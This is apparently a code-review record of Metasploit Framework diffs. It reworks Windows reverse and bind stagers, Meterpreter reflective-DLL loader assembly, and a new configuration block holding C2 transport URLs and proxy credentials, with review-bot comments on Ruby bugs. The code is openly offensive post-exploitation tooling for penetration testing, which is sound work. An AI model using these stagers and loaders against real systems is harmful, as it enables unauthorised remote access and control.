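Review bot: `def stage_payload` now takes no arguments, yet the staged HTTP handlers in this same commit call `obj.stage_payload(uuid: uuid, uri: conn_id)`; if a reflective-DLL payload is ever combined with one of those handlers, Ruby raises ArgumentError ("wrong number of arguments (1 for 0)") at stage time. Keeping an ignored options hash, `def stage_payload(opts={})`, preserves both the old `target_id` callers' shape and the new keyword callers. The Target ID patching block that was removed is not re-suggested — only the signature compatibility is at issue here.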


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
require 'msf/core/payload/uuid_options'
@ -17,6 +18,7 @@ module Msf
module Payload::Windows::ReverseHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
@ -85,6 +87,13 @@ module Payload::Windows::ReverseHttp
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate the URI for the initial stager
#


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_http'
module Msf
@ -15,6 +16,7 @@ module Msf
module Payload::Windows::ReverseHttps
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseHttp
#
@ -64,6 +66,13 @@ module Payload::Windows::ReverseHttps
generate_reverse_https(conf)
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_https(opts)
end
end
end


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
@ -14,41 +15,35 @@ module Msf
module Payload::Windows::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
#
# Register reverse_tcp specific options
#
def initialize(*args)
super
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_tcp(
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
)
end
conf = {
host: datastore['LHOST'],
port: datastore['LPORT'],
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
exitfunk: datastore['EXITFUNC'],
reliable: true
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Generate and compile the stager
#


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
require 'msf/core/payload/windows/reverse_http'
@ -17,15 +18,9 @@ module Msf
module Payload::Windows::ReverseWinHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseHttp
#
# Register reverse_winhttp specific options
#
def initialize(*args)
super
end
#
# Generate the first stage
#
@ -52,6 +47,9 @@ module Payload::Windows::ReverseWinHttp
generate_reverse_winhttp(conf)
end
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate and compile the stager
#
@ -371,6 +369,8 @@ module Payload::Windows::ReverseWinHttp
pop eax ; clear the temporary storage
execute_stage:
xor edi, edi ; clear EDI, so we don't mislead meterpreter into
; thinking it has a valid socket to play with
ret ; dive into the stored stage address
got_server_uri:


@ -1,8 +1,10 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_winhttp'
require 'msf/core/payload/windows/verify_ssl'
require 'rex/payloads/meterpreter/uri_checksum'
module Msf
@ -16,6 +18,7 @@ module Msf
module Payload::Windows::ReverseWinHttps
include Msf::Payload::TransportConfig
include Msf::Payload::Windows::ReverseWinHttp
include Msf::Payload::Windows::VerifySsl
@ -82,6 +85,10 @@ module Payload::Windows::ReverseWinHttps
generate_reverse_winhttps(conf)
end
def transport_config(opts={})
transport_config_reverse_https(opts)
end
#
# Determine the maximum amount of space required for the features requested
#


@ -1,121 +0,0 @@
#-*- coding: binary -*-
require 'msf/core'
require 'rex/payloads/meterpreter/patch'
module Msf
##
#
# Implements stageless invocation of metsrv in x86
#
##
module Payload::Windows::StagelessMeterpreter
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::ReflectiveDLLLoader
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
push ebx ; push the pointer to the extension list
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
mov ebx, eax ; save DllMain for another call
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; indicate that we have detached
push eax ; push some arbitrary value for hInstance
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
asm
end
def generate_stageless_x86(url = nil)
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
conf = {
:rdi_offset => offset,
:length => dll.length,
:exitfunk => datastore['EXITFUNC']
}
asm = asm_invoke_metsrv(conf)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
print_error("Stageless Meterpreter generated with oversized x86 bootstrap.")
return
end
# patch the binary with all the stuff
dll[0, bootstrap.length] = bootstrap
# the URL might not be given, as it might be patched in some other way
if url
# Patch the URL using the patcher as this supports both ASCII and WCHAR.
unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
end
end
# Patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# if a block is given then call that with the meterpreter dll
# so that custom patching can happen if required
yield dll if block_given?
# append each extension to the payload, including
# the size of the extension
unless datastore['EXTENSIONS'].nil?
datastore['EXTENSIONS'].split(',').each do |e|
e = e.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{e}", 'x86.dll'))
# append the size, offset to RDI and the payload itself
dll << [ext.length].pack('V') + ext
end
end
# Terminate the "list" of extensions
dll + [0].pack('V')
end
end
end


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'
@ -14,36 +15,33 @@ module Msf
module Payload::Windows::BindTcp_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'],
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'],
exitfunk: datastore['EXITFUNC'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Generate and compile the stager
#
@ -66,21 +64,17 @@ module Payload::Windows::BindTcp_x64
def required_space
# Start with our cached default generated size
# TODO: need help with this from the likes of HD.
space = 277
space = cached_size
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# EXITFUNK unset will still call ExitProces, which adds 7 bytes (accounted for above)
# TODO: this is coming soon
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
#space += 14
# if the payload doesn't need the listen socket closed then we save space. This is
# the case for meterpreter payloads, as metsrv now closes the listen socket once it
# kicks off (needed for more reliable shells).
space -= 11 unless close_listen_socket
# The final estimated size
space
end
@ -94,7 +88,6 @@ module Payload::Windows::BindTcp_x64
#
def asm_bind_tcp(opts={})
reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.16x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -150,23 +143,11 @@ module Payload::Windows::BindTcp_x64
mov rcx, rdi ; listening socket
mov r10d, 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call rbp ; accept( s, 0, 0 );
^
if close_socket
asm << %Q^
; perform the call to closesocket...
mov rcx, rdi ; the listening socket to close
mov rdi, rax ; swap the new connected socket over the listening socket
mov r10d, 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call rbp ; closesocket( s );
^
else
asm << %Q^
mov rdi, rax ; swap the new connected socket over the listening socket
^
end
asm << %Q^
; restore RSP so we dont have any alignment issues with the next block...
add rsp, #{408+8+8*4+32*7} ; cleanup the stack allocations
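Review bot: The trailing comma on `conf[:exitfunk] = datastore['EXITFUNC'],` in the new `generate` joins the two statements into one multiple assignment, so `conf[:exitfunk]` is set to the array `[datastore['EXITFUNC'], true]` rather than the exit function name (the equivalent block in `ReverseTcp_x64#generate` in this same commit has no comma, which is the intended form). Drop the comma: `conf[:exitfunk] = datastore['EXITFUNC']`. The guard `unless self.available_space.nil? || required_space > self.available_space` is an `unless` over an `||`, which reads more directly as `if self.available_space && required_space <= self.available_space`; the same wording appears in the reverse_tcp x64 `generate`.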


@ -0,0 +1,102 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/reflective_dll_loader'
module Msf
###
#
# Common module stub for ARCH_X86_64 payloads that make use of Meterpreter.
#
###
module Payload::Windows::MeterpreterLoader_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf', 'OJ Reeves' ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' => { 'Convention' => 'sockrdi' },
'Stage' => { 'Payload' => "" }
))
end
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^
unless opts[:stageless]
asm << %Q^
; store the comms socket handle
mov dword ptr [rbx], edi
^
end
asm << %Q^
mov r8, rbx ; r8 points to the extension list
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
^
end
def stage_meterpreter(stageless=false)
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
asm_opts = {
rdi_offset: offset,
length: dll.length,
stageless: stageless
}
asm = asm_invoke_metsrv(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
dll
end
end
end
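Review bot: `stage_meterpreter` and `asm_invoke_metsrv` carry no documentation of their contract, and the `stageless` flag in particular changes what the bootstrap does with the first dword of the config block (`mov dword ptr [rbx], edi` stores the comms socket only when staged, which lines up with the "patched in by the stager" slot in `Rex::Payloads::Meterpreter::Config#session_block` added in this commit). Suggest a header on `stage_meterpreter`: `# Returns the metsrv x64 DLL with the RDI bootstrap patched into its DOS header; with stageless=true the bootstrap leaves the socket slot of the config block untouched.` The positional boolean reads poorly at call sites (`stage_meterpreter(true)`); a keyword `stageless: false` would be clearer if callers outside this diff can follow. The 62-byte bootstrap limit is repeated verbatim in `ReflectiveDllInject_x64#stage_payload`; a shared constant would keep the two checks in step.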


@ -30,10 +30,7 @@ module Payload::Windows::ReflectiveDllInject_x64
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' => { 'Convention' => 'sockrdi' },
'Stage' => {
'Offsets' => { 'EXITFUNC' => [ 47, 'V' ] },
'Payload' => ""
}
'Stage' => { 'Payload' => "" }
))
register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
@ -43,52 +40,60 @@ module Payload::Windows::ReflectiveDllInject_x64
datastore['DLL']
end
def asm_invoke_dll(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
mov r8, rdi ; r8 contains the socket
mov rbx, rax ; save DllMain for another call
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; push 5, indicate that we have detached
pop rdx ; pop 5 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
end
def stage_payload
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
bootstrap = "\x4D\x5A" + # pop r10 ; pop r10 = 'MZ'
"\x41\x52" + # push r10 ; push r10 back
"\x55" + # push rbp ; save ebp
"\x48\x89\xE5" + # mov rbp, rsp ; setup fresh stack frame
"\x48\x81\xEC\x20\x00\x00\x00" + # sub rsp, 32 ; alloc some space for calls
"\x48\x8D\x1D\xEA\xFF\xFF\xFF" + # lea rbx, [rel+0] ; get virtual address for the start of this stub
"\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader
"\xFF\xD3" + # call rbx ; call ReflectiveLoader()
"\x48\x89\xC3" + # mov rbx, rax ; save DllMain for second call
"\x49\x89\xF8" + # mov r8, rdi ; R8 = our socket
"\x68\x04\x00\x00\x00" + # push 4 ;
"\x5A" + # pop rdx ; RDX = signal we have attached
"\xFF\xD0" + # call rax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
"\x41\xB8" + exit_funk + # mov r8d, 0x???????? ; our EXITFUNC placeholder
"\x68\x05\x00\x00\x00" + # push 5 ;
"\x5A" + # pop rdx ; signal we have detached
"\xFF\xD3" # call rbx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
# the DOS headers e_lfanew entry will begin here at offset 64.
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if( bootstrap.length > 62 )
print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" )
return
end
# patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
asm_opts = {
rdi_offset: offset,
exitfunk: 'thread' # default to 'thread' for migration
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
asm = asm_invoke_dll(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# return our stage to be loaded by the intermediate stager
return dll
dll
end
end
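Review bot: The `- 0x11` in `add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}` is an unexplained magic number; the x86 variant removed elsewhere in this commit at least annotates the matching `- 7` with "(+7 bytes)". Presumably 0x11 is the encoded length of the prologue up to the `pop rbx`, so the subtraction moves rbx back to the image base; a comment such as `; 0x11 = bytes from the MZ header to this point, so rbx becomes the image base` would save the next reader the arithmetic. The prologue lines through `call rbx` are byte-for-byte the same as in `Payload::Windows::MeterpreterLoader_x64#asm_invoke_metsrv`, added in the same commit, and could live in one shared helper. `Msf::Payload::Windows.exit_types[opts[:exitfunk]]` yields nil for an unknown name, and `"0x%.8x" % nil` then fails with a TypeError rather than an error naming the bad exit function.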


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'
@ -14,6 +15,7 @@ module Msf
module Payload::Windows::ReverseTcp_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64
@ -29,24 +31,19 @@ module Payload::Windows::ReverseTcp_x64
# Generate the first stage
#
def generate
# TODO: coming later
# Generate the simple version of this stager if we don't have enough space
#if self.available_space.nil? || required_space > self.available_space
# return generate_reverse_tcp(
# port: datastore['LPORT'],
# host: datastore['LHOST'],
# retry_count: datastore['ReverseConnectRetries'],
# )
#end
conf = {
host: datastore['LHOST'],
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
exitfunk: datastore['EXITFUNC'],
reliable: true
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
@ -66,6 +63,10 @@ module Payload::Windows::ReverseTcp_x64
Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Determine the maximum amount of space required for the features requested
#
@ -92,8 +93,9 @@ module Payload::Windows::ReverseTcp_x64
#
def asm_reverse_tcp(opts={})
#retry_count = [opts[:retry_count].to_i, 1].max
# TODO: reliable = opts[:reliable]
# TODO: reliability coming later
reliable = opts[:reliable]
retry_count = [opts[:retry_count].to_i, 1].max
encoded_port = [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
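Review bot: `reliable = opts[:reliable]` is now read at the top of `asm_reverse_tcp` but nothing visible consumes it, and `generate` sets it to `true` only when there is room; if the rest of the method (it continues outside the hunk) does not yet branch on it, the local is dead and the stager is no different with `reliable: true` than without, which is not what the comment in `generate` promises. Either keep the assignment out until the reliability path exists, as the removed `# TODO: reliability coming later` comments did, or add the branch in the same commit. A short comment on `generate`, `# Minimal stager when space is tight: no exitfunk and no reliability checks`, would make the two-tier behaviour explicit.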


@ -1,121 +0,0 @@
#-*- coding: binary -*-
require 'msf/core'
require 'rex/payloads/meterpreter/patch'
module Msf
##
#
# Implements stageless invocation of metsrv in x64
#
##
module Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::ReflectiveDLLLoader
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
mov r8, rbx ; r8 points to the extension list
mov rbx, rax ; save DllMain for another call
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; push 5, indicate that we have detached
pop rdx ; pop 5 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
asm
end
def generate_stageless_x64(url = nil)
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
conf = {
:rdi_offset => offset,
:length => dll.length,
:exitfunk => datastore['EXITFUNC']
}
asm = asm_invoke_metsrv(conf)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
print_error("Stageless Meterpreter generated with oversized x64 bootstrap.")
return
end
# patch the binary with all the stuff
dll[0, bootstrap.length] = bootstrap
# the URL might not be given, as it might be patched in some other way
if url
# Patch the URL using the patcher as this supports both ASCII and WCHAR.
unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
end
end
# Patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# if a block is given then call that with the meterpreter dll
# so that custom patching can happen if required
yield dll if block_given?
# append each extension to the payload, including
# the size of the extension
unless datastore['EXTENSIONS'].nil?
datastore['EXTENSIONS'].split(',').each do |e|
e = e.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{e}", 'x64.dll'))
# append the size, offset to RDI and the payload itself
dll << [ext.length].pack('V') + ext
end
end
# Terminate the "list" of extensions
dll + [0].pack('V')
end
end
end


@ -1,3 +1,2 @@
# -*- coding: binary -*-
require 'rex/payloads/win32'
require 'rex/payloads/meterpreter'


@ -1,2 +0,0 @@
# -*- coding: binary -*-
require 'rex/payloads/meterpreter/patch'


@ -0,0 +1,155 @@
# -*- coding: binary -*-
require 'msf/core/payload/uuid'
require 'msf/core/payload/windows'
require 'msf/core/reflective_dll_loader'
require 'rex/parser/x509_certificate'
class Rex::Payloads::Meterpreter::Config
include Msf::ReflectiveDLLLoader
UUID_SIZE = 64
URL_SIZE = 512
UA_SIZE = 256
PROXY_HOST_SIZE = 128
PROXY_USER_SIZE = 64
PROXY_PASS_SIZE = 64
CERT_HASH_SIZE = 20
def initialize(opts={})
@opts = opts
if opts[:ascii_str] && opts[:ascii_str] == true
@to_str = self.method(:to_ascii)
else
@to_str = self.method(:to_wchar_t)
end
end
def to_b
config_block
end
private
def is_x86?
@opts[:arch] == ARCH_X86
end
def to_str(item, size)
@to_str.call(item, size)
end
def to_wchar_t(item, size)
to_ascii(item, size).unpack("C*").pack("v*")
end
def to_ascii(item, size)
item.to_s.ljust(size, "\x00")
end
def session_block(opts)
uuid = to_str(opts[:uuid].to_raw, UUID_SIZE)
exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
session_data = [
0, # comms socket, patched in by the stager
exit_func, # exit function identifer
opts[:expiration], # Session expiry
uuid # the UUID
]
session_data.pack("VVVA*")
end
def transport_block(opts)
# Build the URL from the given parameters, and pad it out to the
# correct size
lhost = opts[:lhost]
if lhost && opts[:scheme].start_with?('http') && Rex::Socket.is_ipv6?(lhost)
lhost = "[#{lhost}]"
end
url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}"
url << "#{opts[:uri]}/" if opts[:uri]
url << "?#{opts[:scope_id]}" if opts[:scope_id]
# if the transport URI is for a HTTP payload we need to add a stack
# of other stuff
pack = 'A*VVV'
transport_data = [
to_str(url, URL_SIZE), # transport URL
opts[:comm_timeout], # communications timeout
opts[:retry_total], # retry total time
opts[:retry_wait] # retry wait time
]
if url.start_with?('http')
proxy_host = ''
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type].downcase == 'socks'
proxy_host = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
end
proxy_host = to_str(proxy_host || '', PROXY_HOST_SIZE)
proxy_user = to_str(opts[:proxy_user] || '', PROXY_USER_SIZE)
proxy_pass = to_str(opts[:proxy_pass] || '', PROXY_PASS_SIZE)
ua = to_str(opts[:ua] || '', UA_SIZE)
cert_hash = "\x00" * CERT_HASH_SIZE
cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash]
# add the HTTP specific stuff
transport_data << proxy_host # Proxy host name
transport_data << proxy_user # Proxy user name
transport_data << proxy_pass # Proxy password
transport_data << ua # HTTP user agent
transport_data << cert_hash # SSL cert hash for verification
# update the packing spec
pack << 'A*A*A*A*A*'
end
# return the packed transport information
transport_data.pack(pack)
end
def extension_block(ext_name, file_extension)
ext_name = ext_name.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
file_extension))
extension_data = [ ext.length, ext ].pack("VA*")
end
def config_block
# start with the session information
config = session_block(@opts)
# then load up the transport configurations
(@opts[:transports] || []).each do |t|
config << transport_block(t)
end
# terminate the transports with NULL (wchar)
config << "\x00\x00"
# configure the extensions - this will have to change when posix comes
# into play.
file_extension = 'x86.dll'
file_extension = 'x64.dll' unless is_x86?
(@opts[:extensions] || []).each do |e|
config << extension_block(e, file_extension)
end
# terminate the extensions with a 0 size
if is_x86?
config << [0].pack("V")
else
config << [0].pack("Q")
end
# and we're done
config
end
end
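Review bot: `to_ascii` pads with `ljust` but never truncates, so a value longer than its slot (a URL over `URL_SIZE`, a user agent over `UA_SIZE`, a proxy string over `PROXY_HOST_SIZE`) is packed by `A*` at full length and silently shifts every field after it in the fixed-layout block handed to DllMain as `config_ptr`; an over-long value should be rejected rather than emitted, e.g. `raise ArgumentError, "value exceeds #{size} bytes" if item.to_s.length > size` before the `ljust` (this also covers `to_wchar_t`, which goes through `to_ascii`). The same holds for `cert_hash`, taken from `opts[:ssl_cert_hash]` unchecked although the slot is exactly `CERT_HASH_SIZE` bytes: `raise ArgumentError, "cert hash must be #{CERT_HASH_SIZE} bytes" unless cert_hash.length == CERT_HASH_SIZE`. `opts[:proxy_type].downcase` raises NoMethodError when host and port are given without a type; `opts[:proxy_type].to_s.downcase` keeps the tolerant behaviour of the removed `Patch.patch_proxy!`. `[0].pack("Q")` uses host byte order while every other field is packed little-endian with `V`; `"Q<"` makes the x64 terminator explicit. In `extension_block` the locals `o` and `extension_data` are assigned and never used; the packed string can simply be the last expression.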


@ -1,166 +0,0 @@
# -*- coding: binary -*-
module Rex
module Payloads
module Meterpreter
###
#
# Provides methods to patch options into metsrv stagers
#
###
module Patch
#
# Replace the transport string
#
